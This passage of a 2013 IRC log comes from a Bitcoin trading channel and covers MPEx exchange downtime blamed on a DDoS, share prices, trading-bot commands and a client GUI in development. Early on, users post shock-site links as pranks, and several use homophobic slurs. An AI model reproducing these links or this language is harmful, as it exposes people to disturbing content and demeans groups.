07:48:02 Rick__ http://dpaste.com/1018975/ Mar 11 07:48:11 [BTCTC] [BASIC-MINING] 1 @ 0.345 BTC [+] Mar 11 07:48:16 that's like not being able to go to Rick__.isgay.com back in the 90's Mar 11 07:48:17 Rick__ and mpex.coinbr.com works or it was harmonized, too? Mar 11 07:48:29 harmonized lol Mar 11 07:48:31 roflmao Mar 11 07:48:41 lol Mar 11 07:48:43 yes it works now Mar 11 07:48:46 a cool. Mar 11 07:48:48 yea, that's official term Mar 11 07:49:00 more like hummerized Mar 11 07:49:03 <[\\\]> aww Mar 11 07:49:05 thank you all Mar 11 07:49:09 <[\\\]> they got ride of the wildcard cna Mar 11 07:49:10 <[\\\]> cname Mar 11 07:49:12 poor rick tho. he's had a full weekend Mar 11 07:49:17 what with all the emerging surprises Mar 11 07:49:19 <[\\\]> it was always fun to point people to meatspin Mar 11 07:49:27 <[\\\]> http://smickles.loves.meatspin.com Mar 11 07:49:28 was? Mar 11 07:49:42 <[\\\]> but the wildcard is gone, so it doesn't work now Mar 11 07:49:47 <[\\\]> only http://meatspin.com Mar 11 07:49:48 doesn't resolve smickles Mar 11 07:50:12 error 503... Mar 11 07:50:13 it's hard enough to find goatse, even, anymore Mar 11 07:50:18 for me Mar 11 07:50:37 I was talking about mpex.coinbr Mar 11 07:50:40 <[\\\]> http://www.goatse.bz/ Mar 11 07:50:50 !proxies Mar 11 07:50:51 what's leve is http://youtu.be/oHg5SJYRHA0 Mar 11 07:50:53 and such Mar 11 07:50:57 MJR_: $ Mar 11 07:50:58 <[\\\]> http://www.prolapseman.com/ Mar 11 07:51:05 $proxies Mar 11 07:51:07 MJR_: ["http://mpex.coinbr.com"] Mar 11 07:51:10 hum it's fine here MJR_ Mar 11 07:51:12 <[\\\]> http://www.walkthedinosaur.com/ Mar 11 07:51:23 badgerbadgerbadger.com Mar 11 07:51:49 did you put the new key in the faq? Mar 11 07:52:01 Rick__ not yet. Mar 11 07:52:01 i don't think so Mar 11 07:52:07 okay Mar 11 07:52:08 ;;ident mircea_popescu Mar 11 07:52:08 Nick 'mircea_popescu', with hostmask 'mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu', is identified as user mircea_popescu, with GPG key id 8A736F0E2FB7B452, key fingerprint 6160E1CAC8A3C52966FD76998A736F0E2FB7B452, and bitcoin address None Mar 11 07:52:13 but he's legit Mar 11 07:52:27 Rick__ i'll be doing the updates of that nature once we get stuff back online and runnign smoothly Mar 11 07:52:39 it was announced early feb and since then but Mar 11 07:52:44 obviously some people missed it Mar 11 07:52:48 okay Mar 11 07:55:07 Ltc hit .40 should have waited a few hours to dump lol Mar 11 07:57:21 srlsy ? Mar 11 07:57:49 MJR_: don't worry over it, prolly will crash soon Mar 11 07:57:56 oh I know Mar 11 07:58:03 please yes Mar 11 07:58:15 need to load hehe Mar 11 07:58:17 I only am mining it because I have 28 cores doing nothing Mar 11 07:58:33 make sens Mar 11 07:58:37 ... Mar 11 07:58:37 and I can't get cash to btc-e otherwise Mar 11 07:58:41 i guess it will crash while i'll be waiting for litecoind to sync. i have such luck Mar 11 07:59:03 the june 2010 peak looks so pathetic from up here Mar 11 07:59:07 that's where my deposit came from today jurov :) Mar 11 07:59:59 by the way, im not sure what you guys use, but im loving gnucash Mar 11 08:01:14 and if it's at all possible to generate ofx files it would be awesome! Mar 11 08:07:26 so if you anticipated the rise, amazon cloud mining would've been very profitable Mar 11 08:08:49 may 15 2011, was when that howto was posted Mar 11 08:09:32 can i pay miner fees in ltc instead? Mar 11 08:10:04 miner fees? like bitcoin tx fees? Mar 11 08:11:32 jesus fuck, bitcoin was under 6 usd on may 11 2011. leveraging amazon cloud would made bank Mar 11 08:11:50 then you still had that whole fall to 2 Mar 11 08:14:56 ;;calc .38 / 9 * 45 Mar 11 08:14:57 1.9 Mar 11 08:15:24 oh, maybe not :/ Mar 11 08:15:55 https://bitcointalk.org/index.php?topic=8405.msg126121#msg126121 Mar 11 08:16:07 "Congratulations! You've just discovered a ceiling above which price of bitcoin will never rise (at current difficulty). 20/0.38 = 52.63 USD/BTC." Mar 11 08:22:24 wtf? tesla only gets 80mh/s Mar 11 08:22:57 MJR_: that was some time ago Mar 11 08:23:03 improvements have been made Mar 11 08:23:15 I can imagine Mar 11 08:23:43 my fpga project is coming along Mar 11 08:26:10 hmm. think getting a ticker price on Bloomberg is possible Mar 11 08:30:03 [HAVELOCK] [HIM] 1 @ 1.74 BTC [+] Mar 11 08:31:03 [HAVELOCK] [KCIM] 1 @ 1.48 BTC [+] Mar 11 08:36:39 mpex dead? Mar 11 08:36:48 nope Mar 11 08:36:54 $proxies Mar 11 08:36:56 smickles: ["http://mpex.coinbr.com"] Mar 11 08:37:02 $list SupyMPEx Mar 11 08:37:02 smickles: depth, post, proxies, and vwap Mar 11 08:37:13 $help post Mar 11 08:37:13 smickles: (post ) -- Supply a pastebin paste key containing a signed and encrypted MPEx command. Respondes with a pastebin URL with MPEx's response. Mar 11 08:37:16 nm.. had wrong url Mar 11 08:37:28 hi random_cat Mar 11 08:37:56 howdy mircea_popescu Mar 11 08:38:50 Anyone selling ASICMiner shares at 0.6/share? Mar 11 08:39:44 !ticker btct asicminer-pt Mar 11 08:39:46 [BTCT:ASICMINER-PT] 1D: 0.65 / 0.70633 / 0.79899 (146 shares, 103.1 BTC), 7D: 0.65 / 0.68884 / 1 (1322 shares, 910.6 BTC), 30D: 0.65 / 0.68884 / 1 (1322 shares, 910.6 BTC) Mar 11 08:39:53 not yet that ow is it. Mar 11 08:40:22 What? Mar 11 08:40:31 kakobrekla: what do you think about putting !help and $list SupyMPEx in the topic? Mar 11 08:40:32 asicminer. not yet quite at .6 Mar 11 08:40:37 smickles pms Mar 11 08:41:09 I don't know what you mean mircea Mar 11 08:41:50 asicminer-pt is the btct.co listed passthrough for asicminer. Mar 11 08:42:00 it has traded between .65 and about 1. Mar 11 08:42:07 it dropped recently, but not as low as .6 Mar 11 08:42:39 mircea_popescu: what was the bond interest rate last month? Mar 11 08:42:40 Why has it dropped? It's current the best stock right now, isn't it? Mar 11 08:42:57 not in any estimation i'm familiar with. what do you mean "best" ? Mar 11 08:43:07 MJR_ 5%ish iirc. Mar 11 08:43:14 want me to look ? Mar 11 08:43:25 MJR? Mar 11 08:43:41 no worries Mar 11 08:43:54 https://twitter.com/maxkeiser/status/310915333592588289 lol this guy. Mar 11 08:44:00 just want to diversify this month, we'll see Mar 11 08:44:07 he's been on some interview, and every 5 minutes, "hey, did i mention i'm a bitcoin millionaire ?" Mar 11 08:45:02 [HAVELOCK] [KCIM] 1 @ 1.48 BTC [+] Mar 11 08:45:08 Well what is considered better than ASICMiner in your opinion? Mar 11 08:45:25 by what criteria betteR ? Mar 11 08:45:27 is this to be our rockefellers and Astors? Mar 11 08:45:53 Franktank: it really only depends on what you have to pay Mar 11 08:46:02 Dividend payout, increased resale value, etc Mar 11 08:46:46 by historical resale value s.mpoe, indubitably. it opened like 2.9k satoshi, now trading 75s Mar 11 08:47:01 by dividend payout s.dice, it paid out something like 68k btc so far Mar 11 08:47:36 course s.bbet also saw some crazy appreciation but most of it happened on ipo day Mar 11 08:50:38 mindblown. Mar 11 08:51:25 lol Mar 11 08:52:20 https://twitter.com/Mircea_Popescu/status/311005716737581057 Mar 11 08:52:26 incredible what fits in 140 chars. Mar 11 08:53:41 mircea_popescu: do you recall what was in that bag? Mar 11 08:53:50 (twitter background pic) Mar 11 08:54:05 girl clothes, some chocolate. water. Mar 11 08:54:31 I had it down for a bag full of chocolate Mar 11 08:54:37 i was close, i suppose Mar 11 08:54:51 :p Mar 11 08:55:12 it's a fuckin purse Mar 11 08:55:19 it's not a purse. Mar 11 08:55:22 it's european. Mar 11 08:55:34 purse Mar 11 08:55:57 not that there's anything wrong with that Mar 11 08:56:07 lol Mar 11 08:56:16 depends on your outlook i guess Mar 11 08:56:17 ZedsterX you missed some references there m'lad. Mar 11 08:56:34 smickles https://si0.twimg.com/profile_background_images/9854979/tweetar.jpg Mar 11 08:57:14 i could be you father btw Mar 11 08:57:20 lad Mar 11 08:57:40 mircea_popescu: http://youtu.be/-d_VAWyCFE8 Mar 11 08:57:54 ZedsterX pix or it never happened. Mar 11 08:58:26 so if i have no pix of me being 48 i am not 48? Mar 11 08:59:17 no, if you have no pix with my (preferably naked) mom Mar 11 08:59:20 you couldn't have been my dad. Mar 11 08:59:26 hehe Mar 11 08:59:30 if you really want something done, you have to admit it's a purse Mar 11 08:59:40 micera gets things done Mar 11 08:59:58 er, mircea Mar 11 09:00:07 lol ima call you scrabbles. Mar 11 09:00:50 i should've typed 'a crime' Mar 11 09:01:00 lol, tim ferriss calls such a "man bag". quite a fag there. Mar 11 09:01:42 tim ferris? that well off dude who writes books? Mar 11 09:02:14 yes. in 5 hour body he admitted to carrying a protable weights in his man bag Mar 11 09:02:23 to weight his poop Mar 11 09:02:27 i don't what Mar 11 09:02:29 i'm not making this up Mar 11 09:02:33 maybe you're just 'mi acre' Mar 11 09:02:40 who weighs their shit !? Mar 11 09:02:52 does he taste it ? Mar 11 09:03:09 best way to grasp the texture Mar 11 09:03:25 nice Mar 11 09:03:58 okay let's get back to choco bonbons Mar 11 09:04:03 http://25.media.tumblr.com/tumblr_lx902wVrSI1qfsmaho1_1280.jpg Mar 11 09:04:06 somewhat related. Mar 11 09:04:06 come to think of it, oral retention, anal retention. BY YOUR POWERS COMBINE! Mar 11 09:04:48 wonder twin powers! Mar 11 09:05:19 ;;ticker Mar 11 09:05:20 BTCUSD ticker | Best bid: 47.55100, Best ask: 47.94000, Bid-ask spread: 0.38900, Last trade: 47.55000, 24 hour volume: 35518.49297168, 24 hour low: 45.47100, 24 hour high: 47.95000, 24 hour vwap: 46.68101 Mar 11 09:07:13 that's a pretty sharp rise Mar 11 09:07:25 one more try here ;) Mar 11 09:08:07 or not...? Mar 11 09:08:09 ~46 to ~48 in a tick's life Mar 11 09:08:43 wow, lotta off-gox trading Mar 11 09:10:04 smickles it'd surprise me if they actually had 1/3 of exchange mkt atm. Mar 11 09:10:46 iknow iknow, but this is what's easily reported Mar 11 09:11:11 kinda going the way of tradehill unfortunately. Mar 11 09:11:34 i think i'm going to end up feeding my options with a usd fixing price Mar 11 09:12:04 orly? Mar 11 09:12:18 i see no other way. Mar 11 09:12:27 hold daily meetings, have a fixing, end of story. Mar 11 09:13:47 daily meeting sorta-kinda seem like they might be your thing Mar 11 09:13:55 lol how do you mean ? Mar 11 09:15:48 lmao totally should have foreseen that... btcusd being officially quoted by mpex Mar 11 09:16:14 jurov it wouldn't be, no. Mar 11 09:16:56 do you know how fixing works? Mar 11 09:16:57 [MPEX] [S.MPOE] 244641 @ 0.00075 = 183.4808 BTC [+] Mar 11 09:16:59 [MPEX] [S.MPOE] 5359 @ 0.00076718 = 4.1113 BTC [+] Mar 11 09:17:03 well, it works better kinda, takes direct messages... but it blew up on the second message. Mar 11 09:17:06 http://dpaste.com/1019032/ Mar 11 09:17:20 lemme see... Mar 11 09:17:26 like you maybe-might be in the position to have the time for them and beyond that your bouyant bayance by speech is not much matched here ;) Mar 11 09:17:46 hahaah saywut! Mar 11 09:17:47 mircea_popescu perhaps not fully in this situation Mar 11 09:18:00 ok, it's like this. suppose the three main dealers are A, B and C. Mar 11 09:18:13 chair X calls the meeting. X proposes price, say 47.5 Mar 11 09:18:27 a, b and c go through their books, see what customers want, see what they want on their own account Mar 11 09:18:45 then they say. a buys 50k usd. b sells 25k usd. c sells 70k usd. Mar 11 09:18:52 25 + 70 > 50k so its not fixed Mar 11 09:18:58 x has to call a lower price now Mar 11 09:19:00 ah that kind of meeting you mean Mar 11 09:19:01 say 47.3 Mar 11 09:19:08 now a b and c review their books Mar 11 09:19:14 think i just need to add some sleep time.... Mar 11 09:19:14 42 12 40 Mar 11 09:19:15 etc Mar 11 09:19:27 this process is called fixing, it's widely used to obtain a price. Mar 11 09:19:34 you get that going and you'll have all the fun Mar 11 09:19:55 well, fun goes to the mean in general. Mar 11 09:20:35 i think fun occurs most in the regression. the mean is just incidental Mar 11 09:20:44 tat's a point. Mar 11 09:21:10 heh i first understood "mean" as in the other meaning Mar 11 09:21:27 tht's what i originally meant :D Mar 11 09:21:46 yeah, english is fucked that way Mar 11 09:21:57 darn Mar 11 09:21:59 english is mean Mar 11 09:22:12 oh, lol Mar 11 09:22:59 wtf? past historic first singular: bayai Mar 11 09:23:02 ???? Mar 11 09:23:25 baierai Mar 11 09:23:34 how the fuck is that a word!!?!?! Mar 11 09:23:52 to dance. Mar 11 09:23:54 french Mar 11 09:24:14 wuh? Mar 11 09:24:17 o no wait Mar 11 09:24:23 this is wtf, yawning ? Mar 11 09:24:28 supposedly, this is english Mar 11 09:24:51 maybe via french in the middle ages Mar 11 09:25:04 baieraient Mar 11 09:25:30 eh cmon this is french Mar 11 09:25:50 oh, i'm on the wrong wikipedia Mar 11 09:25:54 ahahaha lmao Mar 11 09:26:03 FabianB : Mar 11 09:26:06 $proxies Mar 11 09:26:07 there's a lot of french here which i didn't notice Mar 11 09:26:07 mircea_popescu: ["http://mpex.coinbr.com"] Mar 11 09:26:51 and ima be off. later all! Mar 11 09:27:06 later! Mar 11 09:27:27 !later Mar 11 09:27:41 heh Mar 11 09:28:00 im talkin to da mpex bot via private message Mar 11 09:28:02 [HAVELOCK] [HIM] 2 @ 1.46 = 2.92 BTC [-] Mar 11 09:28:12 at least thats working ok lol Mar 11 09:28:36 got the depth back and output is good, now to see if I can successfully get another request Mar 11 09:29:02 [HAVELOCK] [SDICE] 1 @ 0.5451 BTC [-] Mar 11 09:29:14 wtf Mar 11 09:29:20 call it bitchhotter Mar 11 09:30:02 [HAVELOCK] [KCIM] 1 @ 1.12 BTC [-] Mar 11 09:30:19 heheh Mar 11 09:30:45 so it seems like it gets the first request and weather, vwap or depth, works great. Mar 11 09:31:17 but on the second request i only seem to get a Pastebin.com Unknown Paste ID Mar 11 09:31:24 in html... ok Mar 11 09:32:52 maybe one just needs to wait a bit between requests? Mar 11 09:34:05 ok one more try... its already way less shitty than yesterday Mar 11 09:35:00 ;;goxlag Mar 11 09:35:01 2025.557307 seconds Mar 11 09:35:10 what is the record? Mar 11 09:37:14 [BTCTC] [ASICMINER-PT] 1 @ 0.719999 BTC [-] Mar 11 09:38:55 first command worked good Mar 11 09:39:08 gonna wait before i issue next command Mar 11 09:39:47 here's the output from the first, smpoe vwap: http://dpaste.com/1019052/ Mar 11 09:42:16 ok lets try second one? Mar 11 09:43:01 ok. heh. Mar 11 09:43:45 s.dice depth returned fine: http://dpaste.com/1019055/ Mar 11 09:48:33 third command worked fine, maybe I got it fixed... http://dpaste.com/1019058/ Mar 11 09:49:01 gonna check this in quick Mar 11 09:58:59 ok here you go guys: https://github.com/modsix/bitotter_perl/blob/master/bitotter_market_data.pl Mar 11 09:59:59 i'll still add more stuff, like it checking stuff out with gribble... so thats still coming yet Mar 11 10:01:47 anyway, have a good one :] Mar 11 10:04:46 jurov: was over ten minutes a couple days ago Mar 11 10:05:09 dub ? Mar 11 10:05:17 goxlag Mar 11 10:05:40 2000 seconds is more than 10 min Mar 11 10:06:15 oh i missed a 0 Mar 11 10:20:37 !help Mar 11 10:20:37 List of commands: Mar 11 10:20:38 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 11 10:20:39 !mp (desc: returns the response from MPEX order) Mar 11 10:21:22 !ticker SDICE Mar 11 10:21:22 How can I be of assistance, my poor man? Mar 11 10:21:41 !ticker G.SDICE Mar 11 10:21:42 Um, shouldn't you be with your own tribe or somethin'? Mar 11 10:23:30 !ticker MPEX Mar 11 10:23:31 Yeah. No damn tobacco, that's for sure. Mar 11 10:23:54 !ticker MPEX S.DICE Mar 11 10:23:55 [MPEX:S.DICE] 1D: 0.005884 / 0.00594744 / 0.006 (30426 shares, 180.96 BTC), 7D: 0.00300001 / 0.00560095 / 0.006225 (403237 shares, 2,258.51 BTC), 30D: 0.00300001 / 0.00616304 / 0.0069 (3614671 shares, 22,277.39 BTC) Mar 11 10:30:29 [BTCTC] [ESECURITYSABTC] 1 @ 0.22001 BTC [-] Mar 11 10:49:32 [BTCTC] [B.YABMC] 1 @ 0.01231 BTC [-] **** BEGIN LOGGING AT Mon Mar 11 23:47:05 2013 Mar 11 23:47:10 it is being spliced as we speak Mar 11 23:47:29 soo what's new ? Mar 11 23:47:36 channel flaming you Mar 11 23:47:39 o rly ? Mar 11 23:47:40 busted ass mpex Mar 11 23:47:54 must increase fee ? Mar 11 23:47:59 mos def Mar 11 23:48:00 im not flaming. just saying id like to know more about why its down Mar 11 23:48:02 50btc Mar 11 23:48:22 gesell ddos. Mar 11 23:48:32 to be mitigated using .... RAID??? Mar 11 23:48:36 why not host some static pages on free cloud services? Mar 11 23:48:40 that's not good enough mircea_popescu Mar 11 23:48:40 jurov that's unrelated. Mar 11 23:48:46 we'll need a graph or something Mar 11 23:48:51 gesell you can use the proxy listed in topic or else the irc bots to trade Mar 11 23:48:55 yes... but it looked liike i'm ddosed Mar 11 23:49:18 jurov all cloud is yet kinda shaky you know ? Mar 11 23:49:26 mircea_popescu: proxy is fine. just curious the logic. seems that loosing the face of mpex (which the web presense is part of) would make some question Mar 11 23:49:45 mircea_popescu: the questions are natural for investors. and also natural to want more details... Mar 11 23:49:58 gesell surely. there's been ample disucssion here and also reports regularly posted in the forum. Mar 11 23:49:59 if its ddos, whats the plan. just no web presence? Mar 11 23:50:06 okay Mar 11 23:50:08 let me get you a link eh ? Mar 11 23:50:16 yup, cool Mar 11 23:50:20 its raining in the cloud today Mar 11 23:50:46 jurov: you did tick the persistent storage box rite? don't do a poland Mar 11 23:50:55 gesell https://bitcointalk.org/index.php?topic=138956.msg1598165#msg1598165 Mar 11 23:51:19 o, he moved all coinbr to amazon ? Mar 11 23:51:22 dub yes that was first thing i checked Mar 11 23:51:46 mircea_popescu, pretty much. except keys and such Mar 11 23:53:12 i did except flaky performance...but 25 second I/O delays causing whole machine to drop connections? er, uhm. Mar 11 23:54:24 heh latest update from tech Mar 11 23:54:27 "We got the server rebuilt. Issues as expected. It's working in RAID 10 right now. I know you said RAID 6 but before we take this down again, can you live with 10?" Mar 11 23:55:10 true ballers roll raid 1000 Mar 11 23:55:27 i'm like... meh, watch me go 10 and then have two disks fail. Mar 11 23:56:40 mircea_popescu when does rota get paid Mar 11 23:56:46 end of the year. Mar 11 23:56:49 you can pay me quarterly, I'm fine with it Mar 11 23:56:51 lol Mar 11 23:57:09 what if you can't afford it by then Mar 11 23:57:18 then you're sol aren;t you Mar 11 23:57:24 hurrrrr Mar 11 23:58:03 jcpham, go to btcjam and show them your proof of employment Mar 11 23:58:12 he's employed now ?! Mar 11 23:58:20 no thank you jurov Mar 11 23:58:27 "employed" in rota Mar 11 23:58:36 why would i even have a btcjam account Mar 11 23:58:46 i heard they loan liquidity to an exchange Mar 11 23:58:56 haha... ashamed, better forgot Mar 11 23:59:15 jcpham i wouldn't wory about that, it's kinda like coinlab bringing rupees to wall street Mar 12 00:00:16 no they're all about bahts, have you seen the symbol? Mar 12 00:00:23 anyway, things are getting pretty much wrapped up, im upgrading mpex.co back online from "this week" to "today". Mar 12 00:00:52 yup, congrats Mar 12 00:03:06 youtube being fags : http://www.youtube.com/embed/8c1BQkKUsx0 < does not need flash ; http://www.youtube.com/watch?v=8c1BQkKUsx0 does need flash Mar 12 00:03:19 have you seen https://bitcointalk.org/index.php?topic=49417.msg1610708#msg1610708 ? Mar 12 00:03:57 howly fuck Mar 12 00:04:00 it just never ends does it Mar 12 00:04:56 wait. this is asicminer pool ? Mar 12 00:04:59 this DrG idiot Mar 12 00:05:31 mircea_popescu: thanks for the link Mar 12 00:05:36 yeah mircea_popescu Mar 12 00:05:48 the op of the asicminer pool decided to fork his pool for a few minutes Mar 12 00:05:48 so basically asicminer made a shitton Mar 12 00:05:53 accidentally Mar 12 00:05:54 and there's going to be drama ? Mar 12 00:06:03 not commiserate with teh ideals of bitcoin, kind of person bitcoin does not need.. The person is blatantly and willfully violating the trust of Bitcoin network and for that he/she should be reprimanded. Mar 12 00:06:06 so while bitcoind was running with no db Mar 12 00:06:12 what is this shit Mar 12 00:06:13 mircea_popescu: are you seriously considering a gmail protocol? this seems nuts. maybe you should consider https://www.ietf.org/rfc/rfc1149 first Mar 12 00:06:14 i assume the miners were doing diff 0 shares Mar 12 00:06:15 dub da fck is this ?! Mar 12 00:06:28 until the hot wallet was empty Mar 12 00:06:57 gesell mail is not nuts. mail is the strongest, oldest and in general best service ever implemented on the internet. Mar 12 00:07:01 I didn't think bitcoind offered work until it was synced Mar 12 00:07:09 in the worst case scenario, mail is the backstop. Mar 12 00:07:19 I think it would have been network diff at the point of the blockchain download you were mining Mar 12 00:07:21 mircea_popescu: yes mail is but using google as a trusted host gate, not sure Mar 12 00:07:21 dub it was prolly bugged. Mar 12 00:07:27 i upgraded bitcoind today Mar 12 00:07:30 it resyncs Mar 12 00:07:33 gesell just had that as an arbitrary name Mar 12 00:07:35 yeah new db Mar 12 00:07:36 dunno how a pool handles the resync Mar 12 00:07:39 at block 195000 it was i think 1.95 m for example Mar 12 00:07:40 it wouldn't certainly be a case of trusting google. Mar 12 00:07:46 the discussion was anyway an "in principle" thing. Mar 12 00:08:14 mircea_popescu: okay Mar 12 00:08:24 MPEx.rb 0.5.0 released (https://github.com/fawuxi/mpex/) includes irc convo logging and a new 'portfolio' command with prediction of your total portfolio value Mar 12 00:08:27 so while he was dl, blocks would have been synching fast- but mining at 200k diff Mar 12 00:08:34 maximian: ^^ Mar 12 00:08:57 mircea_popescu: also proxy discovery included now :) Mar 12 00:08:59 for example Mar 12 00:09:10 FabianB :D Mar 12 00:09:22 irc logging is a good idea. include a ticker to bold my lines ? :D Mar 12 00:09:40 i mean a tickbox Mar 12 00:09:54 "If bank places by mistake 10k into your account, and you cash it out, your will probably rot in jail.." Mar 12 00:10:00 what world do these people live in, seriously ?! Mar 12 00:10:20 thats true, at least here Mar 12 00:10:25 if you dont give it back you will Mar 12 00:10:43 mircea_popescu: it's just the conversation of MPEx.rb with the irc bots, not of this channel Mar 12 00:10:52 if the pool with the most hashrate is mining on a non -up-to-date copy of the blockchain Mar 12 00:10:52 FabianB :p Mar 12 00:10:54 that's an issue Mar 12 00:11:15 dub they will have to sue for unjust enrichment. they may win it, Mar 12 00:11:20 but then again they may not. Mar 12 00:11:39 they always will Mar 12 00:11:41 mircea_popescu: why not use google spreadsheets for graphs and orderbook review? Mar 12 00:11:57 which is why mp lost in his own hand picked rota Mar 12 00:11:59 in that scenerio you would script updates (not pull from an api, as this might overrun google apps limits) Mar 12 00:12:00 pigeons not really true. they always will try to convince the person to return it Mar 12 00:12:11 but afaik such claims are rare. usually cost more to sue than they'd get Mar 12 00:12:18 really, absoulutely trye. give me one example where its not Mar 12 00:12:22 gesell you can go right ahead, or what are you asking ? Mar 12 00:12:33 i have seen it happen here and the bank gets the money back one way or another Mar 12 00:12:35 ive seen plenty where it is true, none where it isnt Mar 12 00:12:57 pigeons you've seen a case where a bank sued the recipient of an error for unjust enrichment ? Mar 12 00:13:00 yes Mar 12 00:13:03 more than one Mar 12 00:13:06 link or docket or anything ? Mar 12 00:13:13 pretty sure its straight up law here Mar 12 00:13:18 [BTCTC] [B.YABMC] 1 @ 0.01401 BTC [-] Mar 12 00:13:20 [BTCTC] [B.YABMC] 1 @ 0.01401 BTC [-] Mar 12 00:13:23 bank fucks up, give it back or the police come get you Mar 12 00:13:24 mircea_popescu: well i would be happy to make some spreadsheets to pull the order books but this would require some sort of mpex api (json or xml or whatever) for that and again, leave you open to ddos. but if you pushed the data onto your own public spreadsheet you would avoid any ddos on your public facing graphs and orderbooks Mar 12 00:13:25 not an expert but iirc it was rare shit. Mar 12 00:13:25 dont have my lexisnexis here Mar 12 00:13:36 gesell you seen the faq ? Mar 12 00:13:38 but sure, i'll remember Mar 12 00:13:47 mircea_popescu: not in bit. checking again Mar 12 00:13:53 specifically, http://mpex.coinbr.com/faq.html#11 Mar 12 00:14:26 oh didnt see the sierra chart feed Mar 12 00:14:30 and json Mar 12 00:14:39 json been there for a while. sierra recent addition Mar 12 00:14:49 also kakobrekla has a websocket feed he's been selling people. Mar 12 00:15:45 mircea_popescu: are those feeds not effected by the ddos? Mar 12 00:16:24 nothing's affected other than the website which people somehow get fixated on. Mar 12 00:18:08 mircea_popescu: it's the face. but is interesting to contemplate what that means and reshaping it. Mar 12 00:18:23 let's think together what that means. Mar 12 00:18:31 domain gets "confiscated", somehow. Mar 12 00:18:35 nobody cares. moving on. Mar 12 00:18:39 that's what it means. Mar 12 00:20:27 mircea_popescu: well its also strange that the proxy seems to be a mirror. as apposed to it being it's own form of interface. Mar 12 00:20:52 it proxies Mar 12 00:20:53 well stock trading volume went down, but never stopped; options as usual Mar 12 00:21:31 if the face effects trades then, well, recovery should be monitored. and hopefully there is recovery Mar 12 00:22:12 or, the face can go away Mar 12 00:22:22 and people can learn to trade anyway Mar 12 00:22:45 gesell say what ? i don't follow Mar 12 00:22:52 the proxy mirror part Mar 12 00:23:40 so the ddoser's name is "the face"? Mar 12 00:23:45 nice Mar 12 00:24:13 lol. the face Mar 12 00:24:22 https://bitcointalk.org/index.php?topic=140472.msg1610300#msg1610300 << most likely to be agreed with forum person. Mar 12 00:24:25 you'd never guess it. Mar 12 00:24:46 https://bitcointalk.org/index.php?topic=151880.msg1612122#msg1612122 another one Mar 12 00:24:50 wtf is going on over there Mar 12 00:25:15 '... or else nazi and nazi' Mar 12 00:25:27 she called him thermos too Mar 12 00:25:36 mircea_popescu: for lack of a better comparison... say for instance that some brokerage firm was had their own interface to nyse showing trades and tickers. this would "feel" decoupled from the excchange itself so people would not associate the two. if nyse decided to change how they present themselves that brokerage face would not be percieved as, i dont know, a quick crutch to fill the gap. where as when it is mirroring nyse so closely Mar 12 00:26:01 gesell are you a web developer by any chance ? Mar 12 00:26:28 mircea_popescu: hobby web dev for aesthetics. serious code and hardware hacker for the $ Mar 12 00:26:34 okay. Mar 12 00:26:56 basically, mircea_popescu does not care how it "feels" Mar 12 00:27:00 hacker meaning reverse engineer (meaning, f;ing serious) Mar 12 00:27:06 aha. Mar 12 00:27:46 pigeons: even if he doesnt care. it is still interesting to consider what the market effects of change of face are, and where the middle ground is, and where there is space to innovate in a intuitive way. or maybe there isnt really Mar 12 00:27:55 not interesting Mar 12 00:28:04 gesell: did you notice that my mpexbot has a direct line into mpex, yet doesn't look like a mirror? Mar 12 00:28:05 pigeons that is exactly the opposite of reality. i very much care how it feels. which is why the proxy doesn't have spurious dongles, but feels just like the real tihng. Mar 12 00:28:06 pigeons: if change of face did effect trade volume, that is interesting to explore Mar 12 00:28:07 ;D Mar 12 00:28:39 what i don't care about is appearance bullshit. there's a very good reason for that : unlike the web, the retail market for plastic figurines and fake fags, Mar 12 00:28:43 i actually have a business. Mar 12 00:29:34 smickles: yeah mpexbot... so it could be that just as mpex forces people to understand that the odd security model is better (and forces people to learn why and learn what pgp is) maybe it is of value to force them to use a different interface in a similar way. but the cause and effect is not as clear with the Web vs Mpexbot, as it was with the gpg protocol Mar 12 00:30:03 for some reason i have a lot of trouble following this guy. Mar 12 00:30:22 mircea_popescu: that mpex gui i'm developing is nearly functionally complete Mar 12 00:30:27 0.0 Mar 12 00:30:37 what do they feed you over there, uppers in speedball sauce ? Mar 12 00:30:40 it better have minecraft Mar 12 00:30:42 gesell: in both cases you need gpg to trade Mar 12 00:31:05 pigeons: not minecraft, but opengl like was discussed yesterday Mar 12 00:31:15 mircea_popescu: not sure. i think i just dont explain abstract thoughts well. Mar 12 00:31:22 i want bricks of some sort then Mar 12 00:31:23 i have a screenshot of it Mar 12 00:31:30 lego mpex Mar 12 00:31:31 totally. opengl. Mar 12 00:31:50 zork mpex too Mar 12 00:31:53 http://imgur.com/fwa71Fj Mar 12 00:32:04 pigeons lemme quote a person familiar with the matter, for your benefit : Mar 12 00:32:11 smickles: is that QT based? Mar 12 00:32:20 nope Mar 12 00:32:23 gtk? Mar 12 00:32:27 nope Mar 12 00:32:36 tcl/tk?? Mar 12 00:32:37 "i get the feeling ima wake up one of these days and like there will be a little mpex anthill, and mpex transaction wallpaint and i can order a stat from the magazin alimentar" Mar 12 00:32:57 it's uppers in speedball sauce based. Mar 12 00:33:30 http://i.imgur.com/JHEHg14.jpg Mar 12 00:33:32 hopped up on goofballs Mar 12 00:33:50 then i hope the buy button creates a buy event on button down and not button released ;) Mar 12 00:33:53 gesell: it's a toolkit which uses opengl, i don't know too much about it Mar 12 00:34:05 i just know how to use it Mar 12 00:34:21 and that i should be able to make binaries for win, mac, linux and android with it Mar 12 00:34:48 what are you using like allegro ? Mar 12 00:35:04 kivy Mar 12 00:35:25 gesell: aw, i picked button released, is that bad? Mar 12 00:35:37 it is yeah. Mar 12 00:35:57 smickles: yes, they people on upper speedball sauce will have to click for each buy whereas on button down they could just Hooooooold and buy shit loads Mar 12 00:36:30 lol Mar 12 00:36:38 lol, well, the buy button goes to a detailed asset page with price and quantity inputs Mar 12 00:36:48 aaaah Mar 12 00:37:13 yeah, i'd figure you'd want to know the best ask if you planned to buy Mar 12 00:37:47 why? Mar 12 00:38:02 this is mpex, we invest for the future, regardless of price Mar 12 00:38:06 sutmm ? Mar 12 00:38:06 http://www.businessinsider.com/intrade-shutting-down-2013-3 Mar 12 00:38:13 i have that one drawn up right now. left side full depth (scrollable) right 2/3's has details up at top and input middle, confirmation button at bottom Mar 12 00:38:24 smickles: sounds good Mar 12 00:38:35 kivy is interesting. new to me Mar 12 00:38:36 if you care about price you are the wrong kind of investor Mar 12 00:38:43 remember that Mar 12 00:38:49 intrade news is old! https://twitter.com/Mircea_Popescu/status/310988017236049921 Mar 12 00:38:50 also, the thing is proxy aware and checks 